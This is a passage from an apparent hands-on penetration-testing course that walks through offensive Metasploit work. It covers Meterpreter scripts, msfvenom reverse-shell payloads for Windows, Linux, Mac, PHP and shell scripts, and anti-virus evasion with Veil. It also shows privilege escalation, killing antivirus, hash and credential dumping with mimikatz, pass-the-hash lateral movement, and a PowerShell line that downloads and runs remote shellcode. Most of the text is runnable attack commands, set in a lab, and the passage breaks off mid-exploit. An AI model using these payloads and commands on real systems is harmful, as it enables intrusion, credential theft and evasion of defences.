  1073. - Created a registry field to the Victim computer, this will allow us to access the machine using and exploit via PSEXEC.
  1074.  
  1075. C:\Windows\system32> reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system  /v LocalAccountTokenFilterPolicy  /t REG_DWORD  /d  1
  1076.  
  1077.  
  1078.  
  1079. ###########################################
  1080. # Chapter 3: Custom Meterpreter Scripting #
  1081. ###########################################
  1082.  
  1083.  
  1084. - In this lab we will be looking at how you can use some custom Meterpreter scripts to do more than what Metasploit
  1085.  
  1086. can offer.  This will also show you the flexibility of the Meterpreter scripts.
  1087.  
  1088. - We're going to start off with a simple Hello World script first.  
  1089.  
  1090.    
  1091. echo 'print_status("Hello World")' > /home/strategicsec/toolz/metasploit/scripts/meterpreter/helloworld.rb
  1092.  
  1093.  
  1094. - This next portion is up to you, exploit your test box and end up with a Meterpreter shell.
  1095.  
  1096. - Lets test out our helloworld.rb Meterpreter script.
  1097.  
  1098.  
  1099. meterpreter> run helloworld
  1100.  
  1101.  
  1102. - So far so good, now we can build on this base.  Lets add a couple more API calls to the script.
  1103.  
  1104. - Open /home/strategicsec/toolz/metasploit/scripts/meterpreter/helloworld.rb in your favorite and add following
  1105.  
  1106. line.
  1107. vi /home/strategicsec/toolz/metasploit/scripts/meterpreter/helloworld.rb
  1108.  
  1109.  
  1110. print_error("this is an error!")
  1111. print_line("this is a line")
  1112.  
  1113. - Now run the script:
  1114.  
  1115. meterpreter> run helloworld
  1116.  
  1117.  
  1118. - Now that we have the basics down, we're going to do something a little more exciting.  
  1119. - The architecture to follow when creating these scripts goes as follows:
  1120.  
  1121. def getinfo(session)
  1122.         begin
  1123.             <stuff goes here>
  1124.         rescue ::Exception => e
  1125.             <stuff goes here>
  1126.         end
  1127. end
  1128.  
  1129.  
  1130. - Copy and paste the following code into our helloworld.rb script:
  1131.  
  1132. def getinfo(session)
  1133.     begin
  1134.        sysnfo = session.sys.config.sysinfo
  1135.        runpriv = session.sys.config.getuid
  1136.        print_status("Getting system information ...")
  1137.        print_status("The target machine OS is #{sysnfo['OS']}")
  1138.        print_status("The computer name is #{'Computer'} ")
  1139.        print_status("Script running as #{runpriv}")
  1140.     rescue ::Exception => e
  1141.       print_error("The following error was encountered #{e}")
  1142.    end
  1143. end
  1144.  
  1145. getinfo(client)
  1146.  
  1147.  
  1148.  
  1149. - Now run the script:
  1150.  
  1151. meterpreter> run helloworld
  1152.  
  1153.  
  1154. - We can expand it by adding actual system commands to the script, lets look at how we can do this.
  1155.  
  1156.  
  1157. def list_exec(session,cmdlst)
  1158.     print_status("Running Command List ...")
  1159.     r=''
  1160.     session.response_timeout=120
  1161.     cmdlst.each do |cmd|
  1162.        begin
  1163.           print_status "running command #{cmd}"
  1164.           r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
  1165.           while(d = r.channel.read)
  1166.  
  1167.              print_status("#{d}")
  1168.           end
  1169.           r.channel.close
  1170.           r.close
  1171.        rescue ::Exception => e
  1172.           print_error("Error Running Command #{cmd}: #{e.class} #{e}")
  1173.        end
  1174.     end
  1175.  end
  1176.  
  1177. commands = [ "set",
  1178.     "ipconfig  /all",
  1179.     "arp -a"]
  1180.  
  1181. list_exec(client,commands)
  1182.  
  1183.  
  1184.  
  1185. - Run the script:
  1186.  
  1187. meterpreter> run helloworld
  1188.  
  1189.  
  1190.  
  1191.  
  1192.  
  1193.  
  1194. ################################################
  1195. # Chapter 4: Writing Meterpreter Resource Files #
  1196. ################################################
  1197.  
  1198.  
  1199. - In this lab we are going to create a binary payload via msfpayload then craft a .rc file that automates the
  1200. process to setup the multi handler listener.
  1201.  
  1202. - We will start off by creating the msfvenom
  1203.  
  1204. sudo /sbin/iptables -F
  1205.     strategicsec
  1206.  
  1207. cd ~/toolz/metasploit
  1208.  
  1209. ./msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.153.164 -f exe > /home/strategicsec/Desktop/meterpreter.exe
  1210.  
  1211. sudo chmod 777 /home/strategicsec/Desktop/meterpreter.exe
  1212.  
  1213. - In the syntax above, we set the payload, set the local host address to connect back too, then redirected the
  1214. malicious payload to our desktop by issuing the correct path. We will also change the permissions on it to 777 just
  1215. to make it easy for us to use WinSCP to copy it over to our Win7 machine.
  1216.  
  1217. - Next we are going to create a .rc (resource file) file that will automate the process for setting up a listener.
  1218.  
  1219. - Navigate to the /home/strategicsec/toolz/metasploit/ so that when you create the .rc file you can save it in the
  1220. working directory.
  1221.  
  1222.  
  1223. - Type 'touch meterpreter.rc' to create the file.
  1224. touch meterpreter.rc
  1225.  
  1226. - Type 'echo use exploit/multi/handler  >> meterpreter.rc' to be appended to the .rc file.
  1227. echo use exploit/multi/handler  >> meterpreter.rc
  1228.  
  1229. - Type 'echo set PAYLOAD windows/meterpreter/reverse_tcp  >> meterpreter.rc' to be appended to the .rc file.
  1230. echo set PAYLOAD windows/meterpreter/reverse_tcp  >> meterpreter.rc
  1231.  
  1232. - Type 'echo set LHOST 192.168.153.164>> meterpreter.rc' to be appended to the .rc file.
  1233. echo set LHOST 192.168.153.164>> meterpreter.rc
  1234.  
  1235. - Type 'echo exploit -j -z >> meterpreter.rc' to be appended to the .rc file.
  1236. echo exploit -j -z >> meterpreter.rc
  1237.  
  1238. - Then cat the meterpreter.rc out to verify that everything in the file looks ok.
  1239. cat meterpreter.rc
  1240.  
  1241. Now at the command prompt, type 'sudo ./msfconsole -r meterpreter.rc' to start the msfconsole module and call/run
  1242.  
  1243. the 'meterpreter.rc' file.
  1244. ./msfconsole -r meterpreter.rc
  1245.  
  1246. - Once the msfconsole starts, the meterpreter resource file is executed and the listener is automatically setup.  It is now listening for a connection!
  1247.  
  1248. - Now you must transfer the malicious meterpreter payload to the victim machine (you may do so by any means necessary, we have physical access so we transferred it via usb.
  1249.  
  1250. - Click on the payload and create the meterpreter session.
  1251.  
  1252. - Type 'sessions -l' to list your open sessions, and 'sessions -i 1' to indicate that you want to interact with
  1253.  
  1254. meterpreter session under id 1.
  1255.  
  1256. exit -y
  1257.        
  1258.  
  1259.  
  1260.  
  1261. ***********************************
  1262. * Getting Serious About .rc files *
  1263. ***********************************
  1264.  
  1265.  
  1266. touch /home/strategicsec/toolz/metasploit/autorun-walk-through.rc
  1267.  
  1268. echo run getcountermeasure >> /home/strategicsec/toolz/metasploit/autorun-walk-through.rc
  1269.  
  1270. echo run winenum >> /home/strategicsec/toolz/metasploit/autorun-walk-through.rc
  1271.  
  1272. echo run post/windows/gather/enum_applications >> /home/strategicsec/toolz/metasploit/autorun-walk-through.rc
  1273.  
  1274. echo run post/windows/gather/enum_logged_on_users >> /home/strategicsec/toolz/metasploit/autorun-walk-through.rc
  1275.  
  1276. echo run post/windows/gather/checkvm >> /home/strategicsec/toolz/metasploit/autorun-walk-through.rc
  1277.  
  1278.  
  1279.  
  1280. - Ok, that was fun. Now let's take a quick look at the .rc file we just created.
  1281. cat /home/strategicsec/toolz/metasploit/autorun-walk-through.rc
  1282.  
  1283.  
  1284.  
  1285.  
  1286. touch /home/strategicsec/toolz/metasploit/old-faithful-ie8.rc
  1287.  
  1288.  
  1289. echo use exploit/windows/browser/ie_cgenericelement_uaf >> /home/strategicsec/toolz/metasploit/old-faithful-ie8.rc
  1290.  
  1291. echo set ExitOnSession true >> /home/strategicsec/toolz/metasploit/old-faithful-ie8.rc
  1292.  
  1293. echo set URIPATH /ie8 >> /home/strategicsec/toolz/metasploit/old-faithful-ie8.rc
  1294.  
  1295. echo set PAYLOAD windows/meterpreter/reverse_tcp >> /home/strategicsec/toolz/metasploit/old-faithful-ie8.rc
  1296.  
  1297. echo set LHOST 192.168.153.164 >> /home/strategicsec/toolz/metasploit/old-faithful-ie8.rc                            
  1298.  
  1299.            
  1300.  
  1301. echo set AutoRunScript multi_console_command -rc /home/strategicsec/toolz/metasploit/autorun-walk-through.rc >> /home/strategicsec/toolz/metasploit/old-faithful-ie8.rc
  1302.  
  1303. echo exploit -j -z >> /home/strategicsec/toolz/metasploit/old-faithful-ie8.rc
  1304.  
  1305.  
  1306.  
  1307. - Ok, that was more fun than the previous one. Now let's take a quick look at the .rc file we just created.
  1308. cat /home/strategicsec/toolz/metasploit/autorun-walk-through.rc
  1309.  
  1310. cat /home/strategicsec/toolz/metasploit/old-faithful-ie8.rc
  1311.  
  1312. - Alright, enough already. Let's run this thing.
  1313. ./msfconsole -r old-faithful-ie8.rc
  1314.  
  1315.  
  1316.  
  1317.  
  1318.  
  1319. #################################
  1320. # Chapter 5: Anti-Virus Evasion #
  1321. #################################
  1322. ------------------------------------------------------------
  1323. - Now it is time to work on some anti-virus evasion. Veil is the new tool on the scene for AV evasion.
  1324. sudo pip install PyInstaller
  1325.         strategicsec
  1326.  
  1327. cd /home/strategicsec/toolz/Veil-Evasion/setup
  1328.  
  1329. sudo ./setup.sh
  1330.         /home/strategicsec/toolz/metasploit/            (when it asks for the path to Metasploit)
  1331.  
  1332. cd /home/strategicsec/toolz/Veil-Evasion/
  1333.  
  1334. sudo python Veil-Evasion.py
  1335.  
  1336. update
  1337.  
  1338. clean
  1339.  
  1340. y
  1341.  
  1342. list
  1343.  
  1344. info 5
  1345.  
  1346. use 5
  1347.  
  1348. set LHOST 192.168.230.128
  1349.  
  1350. info
  1351.  
  1352. generate
  1353.  
  1354.         payload         (when it asks for a base name)
  1355.  
  1356. exit
  1357.  
  1358. sudo mv /usr/share/veil-output/compiled/payload.exe /home/strategicsec/            (my file path for payload.exe might be different)
  1359.  
  1360. sudo chmod 777 /home/strategicsec/payload.exe
  1361.  
  1362. cd ~/toolz/metasploit
  1363.  
  1364. ./msfconsole  -r /usr/share/veil-output/handlers/payload_handler.rc
  1365.  
  1366.  
  1367. - From your Win7 host use WinSCP to copy test.exe from the Ubuntu host to your Win7 desktop.
  1368. - double click test.exe and see if you get a Meterpreter session
  1369.  
  1370.  
  1371.  
  1372. use exploit/windows/local/ask
  1373. set SESSION 1
  1374. set PAYLOAD windows/meterpreter/reverse_tcp
  1375. set LHOST 192.168.230.128                                            (Make sure you change this to your ubuntu ip address)
  1376. set LPORT 7799
  1377. exploit
  1378.  
  1379.  
  1380. meterpreter > getuid
  1381. Server username: win7-64-victim\Workshop
  1382. meterpreter > getsystem
  1383. ...got system (via technique 1).
  1384. meterpreter > getuid
  1385. Server username: NT AUTHORITY\SYSTEM
  1386.  
  1387. meterpreter> ps
  1388.  
  1389. meterpreter> migrate 2110                                       (Make sure this process is running as: NT AUTHORITY\SYSTEM
  1390.  
  1391. meterpreter> run killav
  1392.  
  1393. meterpreter> run post/windows/gather/hashdump
  1394.  
  1395. meterpreter> run post/windows/gather/credentials/credential_collector
  1396.  
  1397. meterpreter > load mimikatz
  1398.  
  1399. meterpreter > kerberos
  1400.  
  1401. meterpreter > background
  1402.  
  1403. exit -y
  1404.  
  1405.  
  1406.  
  1407.  
  1408.  
  1409.  
  1410. ###########################################
  1411. # Section 3: Tunneling For Fun and Profit #
  1412. ###########################################
  1413.  
  1414. *****************************Enumerate the network you are on ***************************
  1415.  
  1416. meterpreter > run netenum
  1417.  
  1418. meterpreter > run netenum -ps -r 192.168.153.0/24
  1419.  
  1420. meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.153.0/24
  1421.  
  1422.  
  1423.  
  1424. ********************************** Set up your Pivot **********************************
  1425.  
  1426. meterpreter > background
  1427.                                                         <-- background the session
  1428.         You want to get back to this prompt:
  1429.         msf exploit(handler) > back                     <--- you need to get to main msf> prompt
  1430.  
  1431.  
  1432.  
  1433.         sessions -l                                     <--find a session you want to pivot through (note the IP and session number)
  1434.        
  1435.         Now set up Pivot with a route add
  1436.         ---------------------------------
  1437.  
  1438. route print
  1439.  
  1440. route add 192.168.153.163 255.255.255.0 1                       <-- Use correct session id (2), it may be 3, or 4 (make sure you are on msf> prommpt, not meterpreter)
  1441.  
  1442.  
  1443. route print                                             <----- verify new route
  1444.  
  1445. ******************************Scan through your Pivot ******************************
  1446.  
  1447. use auxiliary/scanner/portscan/tcp                      <-- Run aux modules through your pivot
  1448.  
  1449. set THREADS 10
  1450.  
  1451. set RHOSTS 192.168.153.0/24             <-- Keep changing this IP and re-running the scan until you find something you want to attack
  1452.  
  1453. set PORTS 445
  1454.  
  1455. run
  1456.  
  1457.  
  1458. ************************* Lateral movement through your Pivot *************************
  1459.  
  1460. -- Option 1:
  1461. use exploit/windows/smb/psexec
  1462.  
  1463. set RHOST 192.168.153.163
  1464.  
  1465. set LPORT 2345
  1466.  
  1467. set SMBUser Workshop
  1468.  
  1469. set SMBPass password
  1470.  
  1471. exploit
  1472.  
  1473.  
  1474.  
  1475.  
  1476. -- Option 2:
  1477. use exploit/windows/smb/psexec
  1478.  
  1479. set SMBUser Workshop
  1480.  
  1481. set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
  1482.  
  1483. set payload windows/meterpreter/reverse_tcp
  1484.  
  1485. set RHOST 192.168.153.163                      
  1486.  
  1487. set LHOST 192.168.153.164
  1488.  
  1489. set LPORT 5678
  1490.  
  1491. exploit
  1492.  
  1493.  
  1494.  
  1495. -- Option 3:
  1496. background
  1497. use auxiliary/admin/smb/upload_file
  1498.  
  1499. set SMBUser Workshop
  1500.  
  1501. set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
  1502.  
  1503. set LPATH /home/strategicsec/binaries/wce.exe
  1504.  
  1505. set RPATH "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\wce.exe"
  1506.  
  1507. set RHOST 192.168.153.163                      
  1508.  
  1509. run
  1510.  
  1511.  
  1512.  
  1513. -- Option 4:
  1514. use auxiliary/admin/smb/upload_file
  1515.  
  1516. set SMBUser Workshop
  1517.  
  1518. set SMBPass password
  1519.  
  1520. set LPATH /home/strategicsec/binaries/wce.exe
  1521.  
  1522. set RPATH "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\wce.exe"
  1523.  
  1524. set RHOST 192.168.153.163                      
  1525.  
  1526. run
  1527.  
  1528.  
  1529. -- Option 5:
  1530. use exploit/multi/handler
  1531. set ExitOnSession false
  1532. set payload windows/meterpreter/reverse_https
  1533. set LHOST 192.168.153.164
  1534. set LPORT 4443
  1535. set EXITFUNC thread
  1536. exploit -j
  1537.  
  1538.  
  1539.  
  1540. sessions -i 1
  1541. shell
  1542. powershell -command "IEX (New-Object Net.WebClient).DownloadString('https://s3.amazonaws.com/StrategicSec-Files/Powersploit/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.153.164 -Lport 4443 -Force"
  1543.  
  1544.  
  1545. ####################################
  1546. # Socks Tunneling with Proxychains #
  1547. ####################################
  1548. --- Open a duplicate putty session to your Ubuntu host
  1549.  
  1550. sudo apt-get install -y proxychains
  1551.     strategicsec
  1552.  
  1553. sudo vi /etc/proxychains.conf                           <--- Make sure that last line of the file is: socks4  127.0.0.1 1080
  1554.  
  1555.         Comment out the proxy_dns, change the 9050 (tor port) to the metasploit socks proxy port (1080) and save it.
  1556.         socks4  127.0.0.1 1080
  1557.  
  1558. ***************************Set up a Socks Proxy through your Pivot *************************
  1559.  
  1560.  
  1561. use auxiliary/server/socks4a
  1562.  
  1563. set SRVHOST 127.0.0.1
  1564.  
  1565. set SRVPORT 1080
  1566.  
  1567. run
  1568.  
  1569.         --- Go back to your other putty session with the meterpreter shell
  1570. cd ~
  1571.  
  1572. proxychains nmap -sT -PN -vv -sV --script=smb-os-discovery.nse -p 445 192.168.153.0/24          <--- This is going to be really slow
  1573.  
  1574. proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000 192.168.153.0/24           <--- This is going to be really slow
  1575.  
  1576.  
  1577.         ---close the duplicate putty session to your Ubuntu host
  1578.  
  1579.  
  1580.  
  1581.  
  1582. ##################
  1583. # Day 2 Homework #
  1584. ##################
  1585. Please take screenshots of you doing videos 11-20 in this playlist
  1586. https://www.youtube.com/playlist?list=PL1512BD72E7C9FFCA
  1587.  
  1588. Please take screenshots of you doing all of the steps in section 3 of this pastebin
  1589.  
  1590. ##################################
  1591. # Section 4: Exploit Development #
  1592. ##################################
  1593.  
  1594. ###############################################
  1595. # Chapter 9: Porting an exploit to Metasploit #
  1596. ###############################################
  1597.  
  1598. ***********************************************
  1599. * Vulnerable Server Versus Fuzzer and Company *
  1600. ***********************************************
  1601.  
  1602.  
  1603. - Inside of your Windows7 VM - download the following file to the Desktop:
  1604. https://s3.amazonaws.com/StrategicSec-Files/SimpleExploitLab.zip
  1605.  
  1606. - Extract this zip file to your Desktop
  1607.  
  1608. - Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
  1609.  
  1610. - Open a new command prompt and type:
  1611. nc localhost 9999
  1612.  
  1613. - In the new command prompt window where you ran nc type:
  1614. HELP
  1615.  
  1616. - Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
  1617. - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
  1618.  
  1619. - Now double-click on 1-simplefuzzer.py
  1620. - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
  1621.  
  1622.  
  1623. - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed
  1624.  
  1625. on.
  1626.  
  1627. - Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and
  1628.  
  1629. attach to process vulnserv.exe
  1630.  
  1631. - Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
  1632.  
  1633. - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
  1634.  
  1635. - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
  1636.  
  1637. - Calculate the distance to EIP by running script 3-3000chars.py
  1638. - This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
  1639.  
  1640. 4-count-chars-to-EIP.py
  1641. - In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
  1642. - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
  1643.  
  1644. 5-2006char-eip-check.py
  1645. - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP
  1646.  
  1647. with 42424242
  1648.  
  1649. 6-jmp-esp.py
  1650. - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
  1651.  
  1652. 7-first-exploit
  1653. - In this script we actually do the stack overflow and launch a bind shell on port 4444
  1654.  
  1655. 8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into
  1656.  
  1657. the host.
  1658.  
  1659.  
  1660. ------------------------------
  1661.  
  1662. cd /home/strategicsec/toolz/metasploit/modules/exploits/windows/misc
  1663.  
  1664. vi vulnserv.rb
  1665.  
  1666.  
  1667.  
  1668. cd ~/toolz/metasploit
  1669.  
  1670. ./msfconsole
  1671.  
  1672.  
  1673.  
  1674. use exploit/windows/misc/vulnserv
  1675. set PAYLOAD windows/meterpreter/bind_tcp
  1676. set RHOST 192.168.153.163
  1677. set RPORT 9999
  1678. exploit
  1679.  
  1680.  
  1681.  
  1682.  
  1683.  
  1684.  
  1685.  
  1686. #########################################
  1687. # Chapter 12: Shellcoding with MSFVenom #
  1688. #########################################
  1689.  
  1690.  
  1691. -No shellcoding walk-through can be considered complete without covering Metasploit’s MSFPayload replacement
  1692. msfvenom.
  1693.  
  1694. -If you have never used msfvenom, the first thing you should do is read the help menu and memorize some of these
  1695. flags:
  1696.  
  1697. -Example 1: If you wish to list all the payloads available, you can do the following (also the same for listing
  1698. encoders, nops, or all):
  1699.  
  1700. ./msfvenom -l payloads  
  1701.  
  1702.  
  1703. - Example 2: Generating a windows/meterpreter/reverse_tcp:
  1704. ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP -f exe
  1705.  
  1706.  
  1707. - Example 3: To generate a payload that avoids certain bad characters:
  1708. ./msfvenom -p windows/meterpreter/bind_tcp -b '\x00'  msfv
  1709.  
  1710.  
  1711. - Example 4: To generate a payload with a specific encoder, and then encode 3 times:
  1712. ./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3  
  1713.  
  1714. -Example 5: Inject a payload to calc.exe, and save it as new.exe
  1715.  
  1716. ./msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -k -f exe > new.exe  
  1717.  
  1718.  
  1719.  
  1720. - msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance.
  1721.  
  1722. -Note: msfvenom has replaced both msfpayload and msfencode as of June 8th, 2015.
  1723.  
  1724. -The advantages of msfvenom are:
  1725. One single tool
  1726. Standardized command line options
  1727. Increased speed
  1728. Msfvenom has a wide range of options available:
  1729.  
  1730. -MSFvenom command line usage
  1731. -You can see an example of the msfvenom command line below and its output:
  1732. -The msfvenom command and resulting shellcode above generates a Windows bind shell with three iterations of the
  1733.  
  1734. -shikata_ga_nai encoder without any null bytes and in the python format.
  1735.  
  1736.  
  1737.  
  1738. -Here is a list of available formats that you can use
  1739.  
  1740. -MSFvenom options and uses
  1741.  
  1742. msfvenom -v or –var-name
  1743.  
  1744. -Usage: -v, –var-name <name>
  1745. -Specify a custom variable name to use for certain output formats. Assigning a name will change the output’s variable
  1746.  
  1747. -from the default “buf” to whatever word you supplied.
  1748. -Default output example:
  1749.  
  1750.  
  1751.  
  1752. msfvenom -n, –nopsled
  1753.  
  1754. -You will occasionally need to add a few NOPs at the start of your payload. This will place a nopsled of [length]
  1755. size at the beginning of your payload.
  1756.  
  1757. msfvenom –smallest
  1758.  
  1759. -If the “smallest” switch is used, msfvenom will attempt to create the smallest shellcode possible using the
  1760. selected encoder and payload.
  1761.  
  1762. msfvenom -c, –add-code
  1763.  
  1764. -Specify an additional win32 shellcode file to include, essentially creating a two (2) or more payloads in one (1)
  1765. shellcode.
  1766.  
  1767. -Payload #1:
  1768.  
  1769. -Adding payload #2:
  1770.  
  1771. -Adding payload #3:
  1772.  
  1773. -Running the “cookies.exe” file will execute both message box payloads, as well as the bindshell using default
  1774. settings (port 4444).
  1775.  
  1776. msfvenom -x, –template & -k, –keep
  1777.  
  1778. -The -x, or –template, option is used to specify an existing executable to use as a template when creating your
  1779. executable payload.
  1780. -Using the -k, or –keep option in conjunction will preserve the template’s normal behavior and have your injected
  1781. payload run as a separate thread.
  1782.  
  1783. - Creating Metasploit Payloads
  1784.  
  1785. -Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module.
  1786. Multiple payloads can be created with this module and it helps something that can give you a shell in almost any
  1787. situation. For each of these payloads, you can go into msfconsole and select exploit/multi/handler. Run ‘set
  1788. payload’ for the relevant payload used and configure all necessary options (LHOST, LPORT, etc). Execute and wait for
  1789. the payload to be run. For the examples below it’s pretty self explanatory but LHOST should be filled in with your
  1790. IP address (LAN IP if attacking within the network, WAN IP if attacking across the internet), and LPORT should be
  1791. the port you wish to be connected back on.
  1792.  
  1793. - List payloads
  1794.  
  1795. msfvenom -l
  1796.  
  1797. - Binaries
  1798.  
  1799. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.153.164 LPORT=4444 -f elf > shell.elf
  1800.  
  1801. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.153.164 LPORT=4444 -f exe > shell.exe
  1802.  
  1803. - Mac
  1804. msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.153.164 LPORT=7777 -f macho > shell.macho
  1805.  
  1806. - PHP
  1807.  
  1808. msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.153.164 LPORT=7777 -f raw  > shell.php
  1809.  
  1810.  
  1811. Scripting Payloads
  1812. - Python
  1813. msfvenom -p cmd/unix/reverse_python LHOST=192.168.153.164 LPORT=4444 -f raw > shell.py
  1814.  
  1815.  
  1816. - Bash
  1817. msfvenom -p cmd/unix/reverse_bash LHOST=192.168.153.164 LPORT=4444 -f raw > shell.sh
  1818.  
  1819.  
  1820. - Perl
  1821. msfvenom -p cmd/unix/reverse_perl LHOST=192.168.153.164 LPORT=4444 -f raw > shell.pl
  1822.  
  1823. -Shellcode
  1824.  
  1825. -For all shellcode options see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output
  1826. code that is able to be cut and pasted in this language for your exploits.
  1827.  
  1828. - Linux Based Shellcode
  1829. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.153.164 LPORT=7777 -f python
  1830.  
  1831. - Windows Based Shellcode
  1832. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.153.164 LPORT=7777 -f python
  1833.  
  1834. - Mac Based Shellcode
  1835. msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.153.164 LPORT=4444 -f python
  1836.  
  1837. -Handlers
  1838. -Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming
  1839. shells. Handlers should be in the following format.
  1840.  
  1841. use exploit/multi/handler
  1842. set PAYLOAD windows/meterpreter/reverse_tcp
  1843. set LHOST 192.168.153.164
  1844. set LPORT 4444
  1845. set ExitOnSession false
  1846. exploit -j
  1847.  
  1848. -Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
  1849.  
  1850.  
  1851.  
  1852.  
  1853.  
  1854. #######################################################################
  1855. # Chapter 13: Converting Metasploit Exploits to a Stand Alone Exploit #
  1856. #######################################################################
  1857.  
  1858.  
  1859.  
  1860. Sometimes you might want to have a stand alone exploit, but the only option out there is a Metasploit module. Sure
  1861. you could always just fire up Metasploit and use it… but what fun would that be? Besides it’s great to understand
  1862. what’s going on under the hood of the Metasploit modules for both getting a handle on writing your own exploits and
  1863. in the future even writing your own Metasploit modules and contributing back to the fantastic project.
  1864. Requirements
  1865.  
  1866. ●     Windows XP – SP3 Virtual Machine (Victim).
  1867. ●     StrategicSec Virtual Machine (Attacker).
  1868. ●     Allied Telesyn TFTP Server 1.9 (Available here:   http://netsec.ws/wp-content/downloads/at-tftpd19.exe).
  1869. ●     A willingness to give things a go.
  1870.  
  1871.  
  1872. -The Target
  1873.  
  1874. -We’re going to be adapting the attftp_long_filename.rb module located at
  1875. -/home/strategicsec/toolz/metasploit/modules/exploits/windows/tftp/attftp_long_filename.rb and changing it into our
  1876. own stand alone Python exploit. I’m by no means an experienced exploit writer so this is something that I’ve hacked
  1877. together and figured out myself, there may be more optimal ways of doing each step. Full credit must be given to
  1878. ‘patrick’ the original author of the module along with prop’s to c0re since we’re pulling out his return address.
  1879. attftp_long_filename.rb
  1880.  
  1881.  
  1882. -Key Points
  1883.  
  1884. -Let’s run through some key points of the module and try and understand it a little better. Only parts that have an
  1885. impact on our exploit will be examined.
  1886.  
  1887.  
  1888. -Default Exit Options
  1889.  
  1890. -As noted above, the default exit function is ‘process’. This the method in which the shellcode will exit after
  1891. running and typically has an impact on how stable the vulnerable program will be after we send our exploit. This
  1892. value should be noted for when we alter the shellcode used to suit our particular situation.
  1893.  
  1894. -Payload
  1895.  
  1896.  
  1897. -The payload is one of the key aspects we need to examine. This states that we have 210 bytes of space for our
  1898. payload to reside in. Any larger and we may possibly run into issues of corruption or truncation of our exploit. Bad
  1899. characters signify bytes that may impact our exploit. We need to ensure none of these characters are in our
  1900. shellcode, and in this case it’s the almost universally bad null character ‘0x00′. For more information on bad
  1901. characters search this site for writing basic buffer overflows. Finally, we see something called stack adjustment.
  1902. Essentially because we’re so restricted in space we need to utilize something called a staged payload. What we’re
  1903. doing is only sending a small first instruction which is designed to connect back to us and get the main payload,
  1904. which wouldn’t regularly fit. Because of this we need to adjust the stack pointer back 3500 bytes so it has room to
  1905. actually write the payload without overwriting itself.
  1906.  
  1907. -Targets
  1908.  
  1909.  
  1910. -Metasploit has a wide variety of targets for many exploits, which really is mostly a wide variety of suitable return
  1911. addresses for each operating system. Because they are often using system DLLs, these addresses are not changed from
  1912. computer to computer and ensures exploit compatibility. In our case, we wish to use the return address donated by
  1913. c0re, Windows XP SP3.
  1914.  
  1915.  
  1916. -The Exploit
  1917.  
  1918.  
  1919. -The main part all the rest has been leading up to, the exploit itself. Let’s go through it line by line to ensure we
  1920. understand.
  1921.  
  1922. -connect_udp
  1923.  
  1924.  
  1925.  
  1926. -This signifies that the exploit will be sent over UDP packets. This line connects sets the target as the values in
  1927.  
  1928. -Metasploit such as RHOST and RPORT.
  1929.  
  1930. -sploit = "\x00\x02" +....
  1931.  
  1932. -The exploit is started with two hex values, ‘0x00′ and ‘0x02′ followed by a series of NOPs. The nops component is going to be variable in length depending on the length of your LAN IP, but always totaling 25 in total. As an example the LHOST value of ‘192.168.1.2’ has a length of 11, while an IP address of ‘192.168.100.123’ has a length of 15. If you want to play around with this fire up IRB (Interactive Ruby Shell) and assign a variable such as LHOST = ‘192.168.1.50’. The command LHOST.length will then tell you the length value – or just count how many characters
  1933. there are including periods.
  1934.  
  1935. -sploit << payload.encoded
  1936.  
  1937.  
  1938.  
  1939. -This line encodes the payload specified within Metasploit and encodes it in the required format. Metasploit will internally determine what payloads are suitable given the space available and the target operating system, and they can be viewed with the ‘show payloads’ command. When we say ‘required format’ it means that it will exclude the nominated bad characters earlier in the exploit.
  1940.  
  1941.  
  1942. -sploit << [target['RET']].pack('V')
  1943.  
  1944.  
  1945. -This command will append the target return address into the exploit string. It’s presented as a variable here because within Metasploit you can nominate different operating systems, but for our purposes it will just be the Windows XP SP3 return address. The pack ‘V’ command signifies that it needs to be packed in little endian format, necessary for x86 processors.
  1946.  
  1947. -sploit << "x88\xc4\x28\xc3"
  1948.  
